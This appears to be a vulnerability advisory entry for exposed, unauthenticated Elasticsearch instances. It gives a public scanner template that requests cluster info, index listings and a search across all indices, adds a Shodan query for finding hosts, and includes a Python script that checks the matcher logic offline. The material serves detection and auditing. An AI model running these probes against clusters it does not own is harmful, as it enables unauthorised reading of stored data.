elasticsearch: ElasticSearch Information Disclosure

Date: 2025-08-01 | Affected software: elasticsearch ElasticSearch | PoC: Public

Vulnerability description

A misconfigured Elasticsearch instance exposes internal information to unauthenticated external users.

PoC code [public]

id: elasticsearch

info:
  name: ElasticSearch Information Disclosure
  author: Shine,c-sh0,geeknik
  severity: low
  description: Internal information is exposed in elasticsearch to external users.
  classification:
    cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: elasticsearch
    product: elasticsearch
    shodan-query: "ElasticSearch"
  tags: elastic,unauth,elasticsearch,misconfig,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/?pretty'
      - '{{BaseURL}}/_cat/indices?v'
      - '{{BaseURL}}/_all/_search'
      - "{{BaseURL}}/_cluster/health?pretty"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"took":'
          - '"number" :'
          - '"number_of_nodes"'
        condition: or

      - type: word
        part: header
        words:
          - application/json
          - application/vnd.api+json
          - text/plain
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"number"\s:\s"([0-9.]+)"'
# digest: 4a0a004730450221008b7d2c71084cea8d7a66ad841642e56c2fc5692b0220fca906916dd5578cbb48022016593f443bcd039bfdd6062440952d0d775b7c46eebec8c243fa8d93d214eb44:922c64590222798bb761d5b6d8e72950
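
The matcher logic of the template above, re-implemented as an added example (not part of the original template or of the scanner that runs it) so the conditions can be checked offline against responses captured from your own instance. The sample responses, the `evaluate` and `audit` names, and the choice to extract the version only on a match are assumptions of this sketch.

```python
import re

# Matcher values copied from the template above.
BODY_WORDS = ['"took":', '"number" :', '"number_of_nodes"']
CONTENT_TYPES = ["application/json", "application/vnd.api+json", "text/plain"]
VERSION_RE = re.compile(r'"number"\s:\s"([0-9.]+)"')


def evaluate(status, headers, body):
    """Return (matched, version): AND across the three matchers, OR inside each."""
    header_text = "\n".join(f"{k}: {v}" for k, v in headers.items())
    matched = (
        any(word in body for word in BODY_WORDS)
        and any(ct in header_text for ct in CONTENT_TYPES)
        and status == 200
    )
    m = VERSION_RE.search(body) if matched else None
    return matched, (m.group(1) if m else None)


JSON = {"Content-Type": "application/json; charset=UTF-8"}
TEXT = {"Content-Type": "text/plain; charset=UTF-8"}

# Constructed sample responses (not captured from a real host).
SAMPLES = {
    "/?pretty": (200, JSON,
                 '{\n  "name" : "node-1",\n  "version" : {\n    "number" : "7.17.0"\n  }\n}'),
    # Compact JSON has no space before the colon, so the '"number" :' word misses it.
    "/ (no ?pretty)": (200, JSON, '{"name":"node-1","version":{"number":"7.17.0"}}'),
    # The sample plain-text table contains none of the three body words.
    "/_cat/indices?v": (200, TEXT,
                        "health status index uuid pri rep docs.count\ngreen open logs abc 1 0 42\n"),
    "/_all/_search": (200, JSON, '{"took":3,"timed_out":false,"hits":{"hits":[]}}'),
    "/_cluster/health?pretty": (200, JSON,
                                '{\n  "cluster_name" : "demo",\n  "number_of_nodes" : 1\n}'),
    # An instance that demands credentials fails the status matcher.
    "/?pretty (auth required)": (401, JSON, '{"error":{"type":"security_exception"},"status":401}'),
}


def audit(samples=SAMPLES):
    """Evaluate every sample and return {name: (matched, version)}."""
    return {name: evaluate(*resp) for name, resp in samples.items()}


if __name__ == "__main__":
    for name, (matched, version) in audit().items():
        print(f"{name:26} exposed={matched} version={version}")
```

A non-match on one path is not evidence that the instance is protected; only the 401 case reflects access control.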